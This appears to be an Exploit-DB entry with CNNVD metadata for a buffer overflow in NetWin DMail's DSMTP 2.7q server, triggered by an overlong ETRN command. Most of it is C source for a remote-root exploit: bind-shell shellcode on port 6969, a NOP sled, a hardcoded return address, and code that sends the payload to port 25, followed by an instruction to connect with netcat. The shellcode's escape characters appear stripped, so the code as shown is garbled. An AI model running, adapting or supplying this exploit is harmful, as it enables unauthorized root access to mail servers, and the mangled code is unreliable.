https://www.exploit-db.com/exploits/19983
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200006-003

NetWindmail包中NetWinDSMTP2.7q版本存在缓冲区溢出漏洞。远程攻击者借助超长ETRN请求可以执行任意命令。

source: http://www.securityfocus.com/bid/1297/info

NetWin's DMail is an alternative mail-server solution for unix and NT servers. There is a buffer overflow vulnerability in the server daemon that could allow remote attackers to execute arbitrary commands as root or cause a denial of service. The overflow occurs when a large buffer is sent to argument the ETRN command: If over 260 characters are sent, the stack is corrupted and the mailserver will crash.

/*
Netwin DSMTP Server v2.7q remote-root exploit 
[email protected] | [email protected]

writen just for fun : ) heh, 
tested arch = x86/Linux mdk7.0
I will port this to Solaris & FreeBSD when I have time...
check http://gsu.linux.org.tr/~noir/ offsets for other Linux distros.

greetz: moog, si_ (happy birthday!), CronoS, still, teso crew, 
gsu-linux, `B, calaz, olympos secteam

FOUND BY Eric Andry [email protected]
*/  
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/time.h>


unsigned char shellcode[]=  /* [email protected] */
"x31xc0x40x40x89x45xf4x48x89x45xf8x48x89"
"x45xfcxb0x66x31xdbx43x8dx4dxf4xcdx80x31"
"xdbx43x43x66x89x5dxecx66xc7x45xeex1bx39"
"x31xdbx89x5dxf0x89x45xf4x89xc2x8dx45xec"
"x89x45xf8xc6x45xfcx10x31xc0xb0x66x31xdb"
"xb3x02x8dx4dxf4xcdx80x89x55xf8x31xc0x40"
"x89x45xfcx31xc0xb0x66x31xdbxb3x04x8dx4d"
"xf8xcdx80x89x55xf4x31xc0x89x45xf8x89x45"
"xf8x89x45xfcxb0x66x31xdbxb3x05x8dx4dxf4"
"xcdx80x89xc2x31xc0xb0x3fx89xd3x31xc9xcd"
"x80x31xc0xb0x3fx89xd3x31xc9xb1x01xcdx80"
"x31xc0xb0x3fx89xd3x31xc9xb1x02xcdx80"
/* generic shellcode execve(args[0],args,0);  aleph1 */
"xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"
"x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"
"x80xe8xdcxffxffxff/bin/sh";




int resolv(char *hname, struct in_addr *addr);

#define RET_MDK70    0xbfff97ec
#define RET_REDHAT60 0xaabbccdd
#define RET_SLACK70  0xddccbbaa
#define NOP 0x90
#define ALIGN 1

int
main(int argc, char *argv[])
{

        int fd, n;
        int i, l;
        unsigned char ovf[860];
        char buff[200];
        int offset = 0; 
        struct sockaddr_in servaddr;
        if (argc < 2 ){
        fprintf(stderr,"%s <host> [offset]n",argv[0]);
        exit(0); 
        }
      if(argv[2])
         offset=atoi(argv[2]); 
printf("Netwin DSMTP v2.7q remote-root exploit by noirn");
        if( (fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0){
        perror("socket");
        exit(-1);
        }
        
        bzero(&servaddr, sizeof(servaddr));
        servaddr.sin_family = AF_INET;
        servaddr.sin_port = htons(25);
        if(!resolv(argv[1], &servaddr.sin_addr)){
        herror("gethostbyname");
        exit(-1); }
     
        if(connect(fd, (struct sockaddr *) &servaddr, sizeof(servaddr)) < 0 ){
        perror("connect");
        exit(-1);
        } 

        n = read(fd, buff, 1024);
        write(STDOUT_FILENO, buff, n);
        sleep(2);
        fprintf(stderr, "check for portshell 6969/tcp when donen");

        memset(ovf, NOP, sizeof(ovf));
        for( i = ALIGN; i < 300; i+=4)
        *(long *) &ovf[i] = RET_MDK70 + offset; 
        for( i = 650, l = 0; l < strlen(shellcode) ;i++, l++)
        ovf[i] = shellcode[l];
        memcpy(ovf, "ETRN ", 5);
        strcpy(ovf+858,"rn");
        write(fd, ovf, strlen(ovf));
        fprintf(stderr,"done!n$ nc %s 6969n", argv[1]);       
        return 1;
}

int
resolv(char *hname, struct in_addr *addr)
{
        struct hostent *hp;
        
if ( (hp = gethostbyname(hname)) == NULL)
        return 0;

  memcpy((struct in_addr *)addr, (char *)hp->h_addr, sizeof(struct in_addr));
        return 1;
}

来源:BID
名称:1297
链接:http://www.securityfocus.com/bid/1297
来源:XF
名称:dmail-etrn-dos
链接:http://xforce.iss.net/static/4579.php
来源:netwinsite.com
链接:http://netwinsite.com/dmail/security.htm
来源:BUGTRAQ
名称:20000601Netwin’sDmailpackage
链接:http://archives.neohapsis.com/archives/bugtraq/2000-05/0407.html